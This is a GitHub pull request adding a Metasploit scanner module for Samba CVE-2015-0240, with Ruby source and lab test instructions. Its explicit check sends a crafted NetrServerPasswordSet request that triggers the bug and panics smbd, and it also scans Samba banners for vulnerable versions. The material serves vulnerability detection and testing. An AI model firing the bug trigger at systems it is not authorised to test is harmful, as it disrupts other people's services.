### PR TITLE
Add CVE-2015-0240 auxiliary module (Samba)

### DIFF
--- a/modules/auxiliary/scanner/smb/smb_uninit_cred.rb
+++ b/modules/auxiliary/scanner/smb/smb_uninit_cred.rb
@@ -57,13 +57,7 @@ class Metasploit3 < Msf::Auxiliary
 
     # This is a good example of passive vs explicit check
     register_options([
-      OptEnum.new('CHECK_STYLE',
-        [
-          true,
-          'Explicit style will actually try to trigger the bug, otheriwse purely a banner check',
-          'PASSIVE',
-          ['EXPLICIT', 'PASSIVE']
-        ])
+      OptBool.new('PASSIVE', [false, 'Try banner checking instead of triggering the bug', false])
     ])
 
     # It's either 139 or 445. The user should not touch this.
@@ -224,16 +218,16 @@ class Metasploit3 < Msf::Auxiliary
         return Exploit::CheckCode::Safe
       end
 
-      case datastore['CHECK_STYLE']
-      when /explicit/i
-        if is_vulnerable?(ip)
-          flag_vuln_host(ip, samba_info)
-          return Exploit::CheckCode::Vulnerable
-        end
-      when /passive/i
+      if datastore['PASSIVE']
         if maybe_vulnerable?(samba_info)
           flag_vuln_host(ip, samba_info)
           return Exploit::CheckCode::Appears
+        end
+      else
+        # Explicit: Actually triggers the bug
+        if is_vulnerable?(ip)
+          flag_vuln_host(ip, samba_info)
+          return Exploit::CheckCode::Vulnerable
         end
       end
     end

--- a/modules/auxiliary/scanner/smb/smb_uninit_cred.rb
+++ b/modules/auxiliary/scanner/smb/smb_uninit_cred.rb
@@ -1,0 +1,275 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/auxiliary/report'
+
+class Metasploit3 < Msf::Auxiliary
+
+  # Exploit mixins should be called first
+  include Msf::Exploit::Remote::DCERPC
+  include Msf::Exploit::Remote::SMB::Client
+  include Msf::Exploit::Remote::SMB::Client::Authenticated
+
+  # Scanner mixin should be near last
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+
+  # Aliases for common classes
+  SIMPLE = Rex::Proto::SMB::SimpleClient
+  XCEPT  = Rex::Proto::SMB::Exceptions
+  CONST  = Rex::Proto::SMB::Constants
+
+  RPC_NETLOGON_UUID = '12345678-1234-abcd-ef00-01234567cffb'
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'Samba _netr_ServerPasswordSet Uninitialized Credential State',
+      'Description'    => %q{
+        This module checks if your Samba target is vulnerable to an uninitialized variable creds.
+      },
+      'Author'         =>
+        [
+          'Richard van Eeden', # Original discovery
+          'sleepya',           # Public PoC for the explicit check
+          'sinn3r'
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['CVE', '2015-0240'],
+          ['OSVDB', '118637'],
+          ['URL', 'https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/'],
+          ['URL', 'https://gist.github.com/worawit/33cc5534cb555a0b710b'],
+          ['URL', 'https://www.nccgroup.com/en/blog/2015/03/samba-_netr_serverpasswordset-expoitability-analysis/']
+        ],
+      'DefaultOptions' =>
+        {
+          'SMBDirect'               => true,
+          'SMBPass'                 => '',
+          'SMBUser'                 => '',
+          'SMBDomain'               => '',
+          'DCERPC::fake_bind_multi' => false
+        }
+    ))
+
+    # This is a good example of passive vs explicit check
+    register_options([
+      OptEnum.new('CHECK_STYLE',
+        [
+          true,
+          'Explicit style will actually try to trigger the bug, otheriwse purely a banner check',
+          'PASSIVE',
+          ['EXPLICIT', 'PASSIVE']
+        ])
+    ])
+
+    # It's either 139 or 445. The user should not touch this.
+    deregister_options('RPORT', 'RHOST')
+  end
+
+  def rport
+    @smb_port || datastore['RPORT']
+  end
+
+
+  # This method is more explicit, but a major downside is it's very slow.
+  # So we leave the passive one as an option.
+  # Please also see #maybe_vulnerable?
+  def is_vulnerable?(ip)
+    begin
+      connect
+      smb_login
+      handle = dcerpc_handle(RPC_NETLOGON_UUID, '1.0','ncacn_np', ["\\netlogon"])
+      dcerpc_bind(handle)
+    rescue ::Rex::Proto::SMB::Exceptions::LoginError,
+      ::Rex::Proto::SMB::Exceptions::ErrorCode => e
+      elog("#{e.message}\n#{e.backtrace * "\n"}")
+      return false
+    rescue Errno::ECONNRESET,
+        ::Rex::Proto::SMB::Exceptions::InvalidType,
+        ::Rex::Proto::SMB::Exceptions::ReadPacket,
+        ::Rex::Proto::SMB::Exceptions::InvalidCommand,
+        ::Rex::Proto::SMB::Exceptions::InvalidWordCount,
+        ::Rex::Proto::SMB::Exceptions::NoReply => e
+      elog("#{e.message}\n#{e.backtrace * "\n"}")
+      return false
+    rescue ::Exception => e
+      elog("#{e.message}\n#{e.backtrace * "\n"}")
+      return false
+    end
+
+    # NetrServerPasswordSet request packet
+    stub =
+      [
+        0x00,                         # Server handle
+        0x01,                         # Max count
+        0x00,                         # Offset
+        0x01,                         # Actual count
+        0x00,                         # Account name
+        0x02,                         # Sec Chan Type
+        0x0e,                         # Max count
+        0x00,                         # Offset
+        0x0e                          # Actual count
+      ].pack('VVVVvvVVV')
+
+    stub << Rex::Text::to_unicode(ip) # Computer name
+    stub << [0x00].pack('v')          # Null byte terminator for the computer name
+    stub << '12345678'                # Credential
+    stub << [0x0a].pack('V')          # Timestamp
+    stub << "\x00" * 16               # Padding
+
+    begin
+      dcerpc.call(0x06, stub)
+    rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
+      elog("#{e.message}\n#{e.backtrace * "\n"}")
+    rescue Errno::ECONNRESET,
+        ::Rex::Proto::SMB::Exceptions::InvalidType,
+        ::Rex::Proto::SMB::Exceptions::ReadPacket,
+        ::Rex::Proto::SMB::Exceptions::InvalidCommand,
+        ::Rex::Proto::SMB::Exceptions::InvalidWordCount,
+        ::Rex::Proto::SMB::Exceptions::NoReply => e
+      elog("#{e.message}\n#{e.backtrace * "\n"}")
+    rescue ::Exception => e
+      if e.to_s =~ /execution expired/i
+        # So what happens here is that when you trigger the buggy code path, you hit this:
+        #   Program received signal SIGSEGV, Segmentation fault.
+        #   0xb732ab3b in talloc_chunk_from_ptr (ptr=0xc) at ../lib/talloc/talloc.c:370
+        #   370   if (unlikely((tc->flags & (TALLOC_FLAG_FREE | ~0xF)) != TALLOC_MAGIC)) {
+        # In the Samba log, you'll see this as an "internal error" and there will be a "panic action".
+        # And then Samba will basically not talk back to you at that point. In that case,
+        # you will either lose the connection, or timeout, or whatever... depending on the SMB
+        # API you're using. In our case (Metasploit), it's "execution expired."
+        # Samba (daemon) will stay alive, so it's all good.
+        return true
+      else
+        raise e
+      end
+    end
+
+    false
+  ensure
+    disconnect
+  end
+
+
+  # Returns the Samba version
+  def get_samba_info
+    res = ''
+    begin
+      res = smb_fingerprint
+    rescue ::Rex::Proto::SMB::Exceptions::LoginError,
+      ::Rex::Proto::SMB::Exceptions::ErrorCode
+      return res
+    rescue Errno::ECONNRESET,
+        ::Rex::Proto::SMB::Exceptions::InvalidType,
+        ::Rex::Proto::SMB::Exceptions::ReadPacket,
+        ::Rex::Proto::SMB::Exceptions::InvalidCommand,
+        ::Rex::Proto::SMB::Exceptions::InvalidWordCount,
+        ::Rex::Proto::SMB::Exceptions::NoReply
+      return res
+    rescue ::Exception => e
+      if e.to_s =~ /execution expired/
+        return res
+      else
+        raise e
+      end
+    ensure
+      disconnect
+    end
+
+    res['native_lm'].to_s
+  end
+
+
+  # Converts a version string into an object so we can eval it
+  def version(v)
+    Gem::Version.new(v)
+  end
+
+
+  # Passive check for the uninitialized bug. The information is based on http://cve.mitre.org/
+  def maybe_vulnerable?(samba_version)
+    v = samba_version.scan(/Samba (\d+\.\d+\.\d+)/).flatten[0] || ''
+    return false if v.empty?
+    found_version = version(v)
+
+    if found_version >= version('3.5.0') && found_version <= version('3.5.9')
+      return true
+    elsif found_version >= version('3.6.0') && found_version < version('3.6.25')
+      return true
+    elsif found_version >= version('4.0.0') && found_version < version('4.0.25')
+      return true
+    elsif found_version >= version('4.1.0') && found_version < version('4.1.17')
+      return true
+    end
+
+    false
+  end
+
+
+  # Check command
+  def check_host(ip)
+    samba_info = ''
+    smb_ports = [445, 139]
+    smb_ports.each do |port|
+      @smb_port = port
+      samba_info = get_samba_info
+      vprint_status("Samba version: #{samba_info}")
+
+      if samba_info !~ /^samba/i
+        vprint_status("Target isn't Samba, no check will run.")
+        return Exploit::CheckCode::Safe
+      end
+
+      case datastore['CHECK_STYLE']
+      when /explicit/i
+        if is_vulnerable?(ip)
+          flag_vuln_host(ip, samba_info)
+          return Exploit::CheckCode::Vulnerable
+        end
+      when /passive/i
+        if maybe_vulnerable?(samba_info)
+          flag_vuln_host(ip, samba_info)
+          return Exploit::CheckCode::Appears
+        end
+      end
+    end
+
+    return Exploit::CheckCode::Detected if samba_info =~ /^samba/i
+
+    Exploit::CheckCode::Safe
+  end
+
+
+  # Reports to the database about a possible vulnerable host
+  def flag_vuln_host(ip, samba_version)
+    report_vuln(
+      :host  => ip,
+      :port  => rport,
+      :proto => 'tcp',
+      :name  => self.name,
+      :info  => samba_version,
+      :refs  => self.references
+    )
+  end
+
+
+  def run_host(ip)
+    peer = "#{ip}:#{rport}"
+    case check_host(ip)
+    when Exploit::CheckCode::Vulnerable
+      print_good("#{peer} - The target is vulnerable to CVE-2015-0240.")
+    when Exploit::CheckCode::Appears
+      print_good("#{peer} - The target appears to be vulnerable to CVE-2015-0240.")
+    when Exploit::CheckCode::Detected
+      print_status("#{peer} - The target appears to be running Samba.")
+    else
+      print_status("#{peer} - The target appears to be safe")
+    end
+  end
+
+end
+


### PR DESCRIPTION
This module will detect if a remote host is vulnerable to CVE-2015-0240. It provides two check styles: explicit and passive. Explicit means that the module will actually trigger the bug (causes an internal error and smbd panic, but no biggie it won't kill samba), which is more accurate, but significantly slower. Passive means the module will check the samba banner, faster but has false positives (that's just how passive checks are). The default is explicit, but the user can change to passive by setting the PASSIVE datastore option to true.
## Setup

To test this, please prepare your box this way:
- [x] A Ubuntu 14.04.2 LTS: http://www.ubuntu.com/download/desktop.
- [x] Samba 4.1.0: https://download.samba.org/pub/samba/stable/samba-4.1.0.tar.gz
- [x] On your Ubuntu box, it's better to install build-essential (I don't know for sure 100% if this is really needed, but why not): `sudo apt-get install build-essential`
- [x] You might also need to do this: `sudo apt-get install python-dev`. I had to do this while compiling Samba.
- [x] Save the following Samba config file under /tmp. Let's name this one /tmp/smb.conf:

```
[global]
    server schannel = yes

[public]
    comment = Guest access share
    path = /public
    browseable = yes
    read only = no
    guest ok = yes
```
- [x] Decompress samba: `tar -xf samba-4.1.0.tar.gz`
- [x] Under the Samba directory, do: `./configure --enable-debug --enable-developer` (you are better off to enable those two flags because it's good for debugging/testing purposes)
- [x] Do: `make`
- [x] Do: `sudo make install`
- [x] Start Samba: `sudo /usr/local/samba/sbin/smbd -s /tmp/smb.conf -D -l /tmp`
- [x] Open another terminal, do: `smbclient -L \\\\[Samba IP]\\public -U Guest` (no pass) to verify that your Samba is working.
- [x] You probably don't need to do this, but check your iptables: `iptables -L`. If necessary, you might need to do `iptables -F`, or add another rule to allow Samba connections. I think with Ubuntu you probably don't need to do this, but I remember other systems like CentOS you do.

Or you can test my box if you can find me in person.
## Testing

Okay, now you are ready to test this module.

**Test the vulnerable Samba**
- [x] Start msfconsole
- [x] Do: `use auxiliary/scanner/smb/smb_uninit_cred`
- [x] Do: `set rhosts [Samba IP]`
- [x] Do: `run`
- [x] The module should say: "The target is vulnerable to CVE-2015-0240", like the following screenshot:

![screen shot 2015-03-04 at 11 53 31 pm](https://cloud.githubusercontent.com/assets/1170914/6500102/57ba9e48-c2cc-11e4-94b6-9bd8f4956206.png)

**Test the non-vulnerable Samba**
- [x] On your Ubuntu box, do: `sudo pkill smbd` to terminate Samba
- [x] Open /tmp/smb.conf (the Samba config file), and comment out the schannel config, like this:

```
[global]
    #server schannel = yes
```
- [x] Restart Samba: `sudo /usr/local/samba/sbin/smbd -s /tmp/smb.conf -D -l /tmp`
- [x] Back to msfconsole, rerun the module (you should be still in EXPLICIT mode), this time it should say: "The target appears to be running Samba". Like the following screenshot:

![screen shot 2015-03-04 at 11 54 02 pm](https://cloud.githubusercontent.com/assets/1170914/6500124/d22f6aa0-c2cc-11e4-8e0a-82a842dd5191.png)

The reason it says "appears to be running Samba" is because it's not triggering the bug anymore, but at least it can tell the target is running Samba.

You can play w/ the passive mode (set PASSIVE true), but honestly that one isn't really important. It uses `smb_fingerprint` to gather the Samba version and determine if the service is vulnerable or not. But after going through the tests above, you should realize that that's not the best way to go because the passive check cannot detect the schannel setting.
